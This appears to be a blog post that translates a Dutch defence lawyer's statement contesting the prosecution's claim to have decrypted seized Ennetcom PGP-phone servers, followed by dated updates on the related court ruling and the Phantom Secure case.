In response to the press release of the public prosecution service today, in which the public prosecutor indicated to have “cracked” the servers, which the public prosecution had seized from client’s organization Ennetcom, announce I, as the client’s counselor, that first has to be determined, that the public prosecution has done these seizures under false pretenses, based on a suspicion of money laundering with the excuse as if the customers of the phones are criminals.

The file showed that the Ennetcom organization had tens of thousands of customers who bought the phones and the software through resellers and that the public prosecutor could name only 4 actual example cases in which there would have been a PGP phone purchased from a reseller. The company proved to have many customers nationally and internationally, also with governmental agencies and businesses, that wish to safely communicate without being hacked without any criminal reasons. The seizure of the servers was, so it seemed, more an attempt by the public prosecution to gain access on improper grounds to an immense amount of data of tens of thousands in order to “catch fish with a trail-net”.

As if KPN or any other telecom company would simply be invaded and all their possessions being plundered to see who sends a wrongful message.

The public prosecution now tries to give the impression that all servers were cracked, but states at the same time that 3.6 million messages were made accessible, apparently giving the impression as if this would mean a lot of communication. The public prosecutor mentions 40,000 users. However, one message is part of a conversation, so consecutive “yes”, “and then”, “what do you mean”, are three messages in one conversation.

Calculating the number of messages to the number of users, 90 messages per user would have been made accessible. Given the fact that the data on the servers was erased after 48 hours by default, in other words; the messages were destroyed, it would indeed mean for those 40,000 users with 3.6 million messages that only the last 48 hours were made accessible.

The public prosecution speaks in the press release remarkably about “encryption keys which were obtained by the public prosecutor and police during the investigation.” Client’s organization however did not obtain these keys. These keys are in possession of the company responsible for making PGP, namely Symantec. There are many other companies that sell their PGP products in the same way as the client’s company did. The “falling of this communication into the hands of” seems therefore to involve a very shadowy area of irregularities and possibly the result of present-day wild hacking.

The public prosecutor assumes to get started on this “loot”, but the Canadian court had, and in my opinion deceived by the public prosecution service, based on the given suspicion, only authorized the use of the confiscated data for 4 defined and appointed investigations. And then there is always the question what messages can be linked to which cases and subsequently be linked to which physical entities.

That still seems a hack too much for me.

UPDATES (from new to old)

UPDATE 2018-04-19: a judge in a Dutch criminal court case rules (in Dutch) the evidence collected in the Ennetcom case, as processed (in Dutch) by the Netherlands Forensic Institute’s big data collection & search engine “Hansken”, lawful. The defendant is sentenced to 18 years’ imprisonment for money laundering and attempted murder.

UPDATE 2018-03-14: yet another case involving PGP-enabled BlackBerry, this time about a Canadian-owned company named Phantom Security Communications aka Phantom Secure: Canadian Company Custom-Made Encrypted Phones for Cartels: FBI. It may have been active “as early as 2008 and continuing up to and including February 28, 2018” in the U.S. According to the indictment (.pdf), their marketing materials stated that on receipt of new BlackBerry phones their technical team “removed the hardware and software responsible for all external architecture, including voice communication, microphone, GPS navigation, camera, Internet and Messenger service”. Customers paid $2000-3500 per six-month subscription.

UPDATE 2017-08-31: a blogpost by Bits of Freedom states that according to Inez Weski, defense lawyer in a case spawned from the Ennetcom investigation, ‘the PGP [private] keys’ were located ‘at a different organization’ than the organization where the Canadian RCMP seized the (or an?) Ennetcom server.
